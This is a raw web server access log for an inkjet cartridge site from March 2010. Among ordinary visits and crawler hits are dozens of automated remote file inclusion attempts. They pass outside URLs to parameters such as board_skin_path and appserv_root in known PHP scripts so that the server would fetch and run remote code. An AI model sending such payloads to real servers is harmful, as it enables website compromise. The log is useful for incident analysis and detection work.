83.103.72.130 - - [02/Mar/2010:04:16:04 -0800] "GET /logs/access.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:16:08 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:16:08 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:16:08 -0800] "GET /logs/access.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:17:56 -0800] "GET /logs/access.log////components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:18:10 -0800] "GET /logs/access.log////components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
96.231.143.30 - - [02/Mar/2010:04:20:27 -0800] "GET /links/links13.html HTTP/1.1" 200 27382 "http://search.yahoo.com/search?p=epson+ink+r300+sets&fr=yfp-t-701&fr2=sb-top&xargs=0&pstart=1&b=41&xa=4qiF3ZEJYxFfFLyjyKEs7g--,1267618695" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
96.231.143.30 - - [02/Mar/2010:04:20:28 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
96.231.143.30 - - [02/Mar/2010:04:21:22 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
93.145.107.229 - - [02/Mar/2010:04:24:06 -0800] "GET /boomerang_images/roi.gif HTTP/1.1" 200 8343 "http://translate.googleusercontent.com/translate_c?hl=it&sl=en&u=http://www.boomerangs.com/corporategifts.html&prev=/search%3Fq%3Dhttp://www.researchsupporttechnologies.com/boomerang_site/boomerang5.htm%26hl%3Dit%26sa%3DG&rurl=translate.google.it&twu=1&usg=ALkJrhiN_fk-QMNJ1H9ca0L2QRfheZV3_w" "Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2) Gecko/20100115 Ant.com Toolbar 2.0 Firefox/3.6 GTBDFff GTB7.0" "site.inkjetcartridge.com"
93.145.107.229 - - [02/Mar/2010:04:24:07 -0800] "GET /boomerang_images/alaska.gif HTTP/1.1" 200 8147 "http://translate.googleusercontent.com/translate_c?hl=it&sl=en&u=http://www.boomerangs.com/corporategifts.html&prev=/search%3Fq%3Dhttp://www.researchsupporttechnologies.com/boomerang_site/boomerang5.htm%26hl%3Dit%26sa%3DG&rurl=translate.google.it&twu=1&usg=ALkJrhiN_fk-QMNJ1H9ca0L2QRfheZV3_w" "Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2) Gecko/20100115 Ant.com Toolbar 2.0 Firefox/3.6 GTBDFff GTB7.0" "site.inkjetcartridge.com"
93.145.107.229 - - [02/Mar/2010:04:24:07 -0800] "GET /boomerang_images/amd.gif HTTP/1.1" 200 10242 "http://translate.googleusercontent.com/translate_c?hl=it&sl=en&u=http://www.boomerangs.com/corporategifts.html&prev=/search%3Fq%3Dhttp://www.researchsupporttechnologies.com/boomerang_site/boomerang5.htm%26hl%3Dit%26sa%3DG&rurl=translate.google.it&twu=1&usg=ALkJrhiN_fk-QMNJ1H9ca0L2QRfheZV3_w" "Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2) Gecko/20100115 Ant.com Toolbar 2.0 Firefox/3.6 GTBDFff GTB7.0" "site.inkjetcartridge.com"
93.145.107.229 - - [02/Mar/2010:04:24:07 -0800] "GET /boomerang_images/magma.gif HTTP/1.1" 200 8881 "http://translate.googleusercontent.com/translate_c?hl=it&sl=en&u=http://www.boomerangs.com/corporategifts.html&prev=/search%3Fq%3Dhttp://www.researchsupporttechnologies.com/boomerang_site/boomerang5.htm%26hl%3Dit%26sa%3DG&rurl=translate.google.it&twu=1&usg=ALkJrhiN_fk-QMNJ1H9ca0L2QRfheZV3_w" "Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2) Gecko/20100115 Ant.com Toolbar 2.0 Firefox/3.6 GTBDFff GTB7.0" "site.inkjetcartridge.com"
93.145.107.229 - - [02/Mar/2010:04:24:07 -0800] "GET /boomerang_images/profly.gif HTTP/1.1" 200 10139 "http://translate.googleusercontent.com/translate_c?hl=it&sl=en&u=http://www.boomerangs.com/corporategifts.html&prev=/search%3Fq%3Dhttp://www.researchsupporttechnologies.com/boomerang_site/boomerang5.htm%26hl%3Dit%26sa%3DG&rurl=translate.google.it&twu=1&usg=ALkJrhiN_fk-QMNJ1H9ca0L2QRfheZV3_w" "Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2) Gecko/20100115 Ant.com Toolbar 2.0 Firefox/3.6 GTBDFff GTB7.0" "site.inkjetcartridge.com"
93.145.107.229 - - [02/Mar/2010:04:24:07 -0800] "GET /boomerang_images/funfly.gif HTTP/1.1" 200 23033 "http://translate.googleusercontent.com/translate_c?hl=it&sl=en&u=http://www.boomerangs.com/corporategifts.html&prev=/search%3Fq%3Dhttp://www.researchsupporttechnologies.com/boomerang_site/boomerang5.htm%26hl%3Dit%26sa%3DG&rurl=translate.google.it&twu=1&usg=ALkJrhiN_fk-QMNJ1H9ca0L2QRfheZV3_w" "Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2) Gecko/20100115 Ant.com Toolbar 2.0 Firefox/3.6 GTBDFff GTB7.0" "site.inkjetcartridge.com"
93.145.107.229 - - [02/Mar/2010:04:24:07 -0800] "GET /boomerang_images/tri-fly.jpg HTTP/1.1" 200 7476 "http://translate.googleusercontent.com/translate_c?hl=it&sl=en&u=http://www.boomerangs.com/corporategifts.html&prev=/search%3Fq%3Dhttp://www.researchsupporttechnologies.com/boomerang_site/boomerang5.htm%26hl%3Dit%26sa%3DG&rurl=translate.google.it&twu=1&usg=ALkJrhiN_fk-QMNJ1H9ca0L2QRfheZV3_w" "Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2) Gecko/20100115 Ant.com Toolbar 2.0 Firefox/3.6 GTBDFff GTB7.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:37:24 -0800] "GET /logs/access.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:37:24 -0800] "GET //yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:37:24 -0800] "GET /logs///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [02/Mar/2010:04:38:20 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [02/Mar/2010:04:38:20 -0800] "GET /logs/access.log///appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [02/Mar/2010:04:38:20 -0800] "GET //appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:38:31 -0800] "GET /logs//board/bbs////write_comment_update.php?board_skin_path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:38:31 -0800] "GET /logs/access.log%20%20//board/bbs////write_comment_update.php?board_skin_path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:38:32 -0800] "GET /board/bbs////write_comment_update.php?board_skin_path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:38:48 -0800] "GET /logs///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:38:48 -0800] "GET /logs/access.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:38:48 -0800] "GET //yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [02/Mar/2010:04:38:48 -0800] "GET //appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [02/Mar/2010:04:38:48 -0800] "GET /logs/access.log///appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [02/Mar/2010:04:38:48 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [02/Mar/2010:04:38:53 -0800] "GET //appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [02/Mar/2010:04:38:53 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [02/Mar/2010:04:38:53 -0800] "GET /logs/access_100101.log///appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [02/Mar/2010:04:38:53 -0800] "GET /logs/access.log///appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:04:39:09 -0800] "GET //yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:04:39:09 -0800] "GET /logs///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:04:39:10 -0800] "GET /logs/access.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:04:39:39 -0800] "GET /logs///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:04:39:39 -0800] "GET //yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:04:39:39 -0800] "GET /logs/access.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:40:09 -0800] "GET /board/bbs////write_comment_update.php?board_skin_path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:40:09 -0800] "GET /logs//board/bbs////write_comment_update.php?board_skin_path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:40:09 -0800] "GET /logs/access.log%20%20//board/bbs////write_comment_update.php?board_skin_path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.241.24.100 - - [02/Mar/2010:04:40:20 -0800] "GET //appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.241.24.100 - - [02/Mar/2010:04:40:22 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.241.24.100 - - [02/Mar/2010:04:40:23 -0800] "GET /logs/access.log///appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.241.24.100 - - [02/Mar/2010:04:40:28 -0800] "GET //appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.241.24.100 - - [02/Mar/2010:04:40:29 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.241.24.100 - - [02/Mar/2010:04:40:30 -0800] "GET /logs/access.log///appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:40:39 -0800] "GET /logs/access.log%20%20//board/bbs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:40:39 -0800] "GET /logs//board/bbs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:40:39 -0800] "GET /board/bbs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:40:50 -0800] "GET /board/bbs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:40:51 -0800] "GET /logs/access.log%20%20//board/bbs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:40:52 -0800] "GET /logs//board/bbs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:40:52 -0800] "GET /board/bbs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:40:52 -0800] "GET /logs/access.log%20%20//board/bbs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [02/Mar/2010:04:40:53 -0800] "GET /logs//board/bbs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.240.39.222 - - [02/Mar/2010:04:41:22 -0800] "GET /logs/access.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.240.39.222 - - [02/Mar/2010:04:41:22 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.240.39.222 - - [02/Mar/2010:04:41:22 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:45:11 -0800] "GET /logs/access_100101.log///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:45:11 -0800] "GET /logs/access.log///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:46:03 -0800] "GET /logs/access_100101.log///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:04:49:43 -0800] "GET //yuboard/delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:04:49:44 -0800] "GET /logs///yuboard/delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:04:49:44 -0800] "GET /logs/access.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.240.39.222 - - [02/Mar/2010:04:50:03 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:04:55:34 -0800] "GET /phpbb/viewtopic.php?t=820 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:04:56:10 -0800] "GET //yuboard/delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:04:56:10 -0800] "GET /logs/access.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:04:56:10 -0800] "GET /logs///yuboard/delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:56:14 -0800] "GET //yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:56:14 -0800] "GET /logs/access.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:56:14 -0800] "GET /logs///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:56:21 -0800] "GET /logs/access.log%20%20////////////////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:56:21 -0800] "GET ///////////////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 2145 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:56:21 -0800] "GET /logs////////////////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 1100 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:04:56:27 -0800] "GET /logs////////////////?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 1100 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:04:56:27 -0800] "GET ///////////////?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 2145 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:04:56:27 -0800] "GET /logs/access.log%20%20////////////////?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:56:29 -0800] "GET /logs/access.log%20%20////////////////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:56:29 -0800] "GET /logs////////////////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 1100 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:56:29 -0800] "GET ///////////////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 2145 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:56:38 -0800] "GET //yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:56:38 -0800] "GET /logs///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:04:56:38 -0800] "GET /logs/access.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:04:58:06 -0800] "GET /phpbb/viewtopic.php?p=4911 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:04:59:25 -0800] "GET /logs/access_100101.log///yuboard/delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:05:00:52 -0800] "GET /logs/access.log///yuboard/delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:05:01:24 -0800] "GET / HTTP/1.0" 200 2116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:05:03:12 -0800] "GET /logs/access_091201.log%20%20///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:05:03:12 -0800] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:05:03:12 -0800] "GET /logs///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:05:04:00 -0800] "GET /logs/access_091201.log%20%20///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:05:04:00 -0800] "GET /logs///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [02/Mar/2010:05:04:00 -0800] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:05:05:51 -0800] "GET /phpbb/viewtopic.php?p=5090 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:05:08:03 -0800] "GET /logs/access_091201.log%20%20///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:05:08:03 -0800] "GET /logs///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:05:08:03 -0800] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:05:10:22 -0800] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [02/Mar/2010:05:10:22 -0800] "GET /logs///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
